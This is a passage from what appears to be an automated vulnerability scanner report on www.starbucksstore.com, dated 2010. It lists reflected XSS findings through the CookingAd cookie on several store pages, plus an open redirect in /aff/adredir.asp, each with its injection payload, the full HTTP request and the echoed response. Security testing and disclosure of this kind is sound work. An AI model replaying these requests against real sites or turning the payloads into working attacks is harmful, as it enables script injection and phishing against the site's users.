   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Gift Page"
   var s_prop3="SBPTPAHP1SHTBF9AD5</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A10C039EE07"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-gifts/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.71. http://www.starbucksstore.com/starbucks-gifts/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gifts/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab9e</script><script>alert(1)</script>091524f545b was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-gifts/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8ab9e</script><script>alert(1)</script>091524f545b;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17245
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:45 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
ame="Starbucks Gift Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Gift Page"
   var s_prop3="SBPTPAHP1SHTB8AB9E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>091524F545B"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-gifts/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.72. http://www.starbucksstore.com/starbucks-reserve [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-reserve

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9601</script><script>alert(1)</script>ad932c6690c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-reserve HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBc9601</script><script>alert(1)</script>ad932c6690c;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29291
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:31 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
ve Coffee Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Reserve Coffee Page"
   var s_prop3="SBPTPAHP1SHTBC9601</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>AD932C6690C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-reserve/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
...[SNIP]...

3.73. http://www.starbucksstore.com/starbucks-seasonal [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-seasonal

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99900</script><script>alert(1)</script>837b0729912 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-seasonal HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB99900</script><script>alert(1)</script>837b0729912;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:35 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
pageName="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Search Listing: Internal: "
   var s_prop3="SBPTPAHP1SHTB99900</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>837B0729912"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_
...[SNIP]...

3.74. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-seasonal/starbucks-seasonal.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7f7</script><script>alert(1)</script>6c9e3006551 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-seasonal/starbucks-seasonal.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3e7f7</script><script>alert(1)</script>6c9e3006551;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:46:17 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
pageName="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Search Listing: Internal: "
   var s_prop3="SBPTPAHP1SHTB3E7F7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6C9E3006551"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_
...[SNIP]...

3.75. http://www.starbucksstore.com/starbucks-via [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-via

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a2e9</script><script>alert(1)</script>f07738979de was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-via HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6a2e9</script><script>alert(1)</script>f07738979de;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32239
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:29 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
eName="Starbucks VIA Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks VIA Page"
   var s_prop3="SBPTPAHP1SHTB6A2E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F07738979DE"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-via/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.76. http://www.starbucksstore.com/tea [CookingAd cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /tea

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4fa1</script><script>alert(1)</script>297d9261d7d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tea HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf4fa1</script><script>alert(1)</script>297d9261d7d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26007
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:58 GMT
Connection: close


       <head>
       <title>Tea at Starbucks Store</title>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
...[SNIP]...
ageName="Tazo Tea HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Tazo Tea HomePage"
   var s_prop3="SBPTPAHP1SHTBF4FA1</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>297D9261D7D"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/tea/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=
...[SNIP]...

4. Open redirection  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The value of the Redir request parameter is used to perform an HTTP redirect. The payload http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 was submitted in the Redir parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 360
Content-Type: text/html
Location: http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750&CCAID=SBPTPAHP1SHCO&Redir=http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&amp;ClassNo=8100&amp;SubClassNo=8750
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:30 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&amp;ClassNo=8100&amp;SubClassNo=8750
...[SNIP]...

Report generated by Hoyt LLC at Tue Nov 16 13:25:22 CST 2010.